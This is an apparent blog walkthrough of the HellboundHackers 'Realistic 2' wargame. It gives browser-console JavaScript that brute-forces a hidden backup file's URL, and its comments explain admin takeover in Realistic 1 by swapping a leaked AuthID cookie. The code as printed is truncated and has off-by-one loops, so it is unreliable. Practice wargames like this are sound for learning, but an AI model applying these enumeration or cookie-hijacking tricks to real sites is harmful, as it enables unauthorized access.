Beating HellboundHackers Realistic 2

Hellboundhackers Challenge Realistic 2:

The link : https://www.hellboundhackers.org/challenges/real2/

Hellboundhackers Realistic 2
Hellboundhackers Realistic 2

Realistic 2: HellBound Hackers Backup Generator:

My Friend heard that HellBound Hackers Backup Generator’s Admin that the had made a backup and they were stored in a directory called bacups/ or backups/ and that the backup file is named in this order year, month, day, hour, .sql with no minutes and he also heard that the backup was made on September of 2004. It looks like backup_2004-09-01_1000.sql

 Difficulty: easy

To find the missing SQL file.

I was just having fun with various hacking sites and then I came to Hellbound Hackers. The Realistic 1 is pretty easy.

For the Realistic 2, this is the JS code that needs to be run from the console.

 	function minTwoDigits(n) {
  		return (n < 10 ? '0' : '') + n;
	function UrlExists(url) {
		    var http = new XMLHttpRequest();
		    http.open('HEAD', url, false);
		    if (http.status != 404){
		    	return url;
		    	return 0;

	for( var day = 1; day <= 31; day++){
		for( var hour = 1; hour <= 24; hour++){
			var url = 'https://www.hellboundhackers.org/challenges/real2/backups/backup_2004-09-' + minTwoDigits(day) + '_' + minTwoDigits(hour) + '00.sql';
			var hidden_link = UrlExists(url);
			if( hidden_link != 0){
				alert("The link is : " + hidden_link);
				// window.location = hidden_link;


  1. Sorry for taking you back to Realistic challenge1, I wonder if all the tricks provided regarding injecting the AuthID while in toys.php still works in 2016. I understood the scenario, locked successfully as johndoe and studied how cookies work,but which AuthID should you redirect to? I tried an example at w3schools but failed.

    1. You are in the right direction. Basically you need to do a AuthID cookie injection to login as the Admin.

      So if you open up the source when you first login, you can see an images directory right? So now go to this directory :


      There you will see a file called administrator.txt

      Here you will see the encrypted password, however, you don’t need to crack it. It also has the AuthID for the Admin user. So just change the cookie to the this AuthID and go to the link to update. And Voila! You are the admin now.


  2. Such a major oversight in your code that literally causes it to waste a whole 24 iterations – September only has 30 days.

    1. Indeed.. You are right. However, doing such challenges, one is not focused on the optimal or the most best program that is out there, rather you would like to complete the challenge as quickly as possible. And hence there may be oversight in my code. But it gets the job done, and in a competition, is that not what you are after really?

Leave a Reply

Your email address will not be published. Required fields are marked *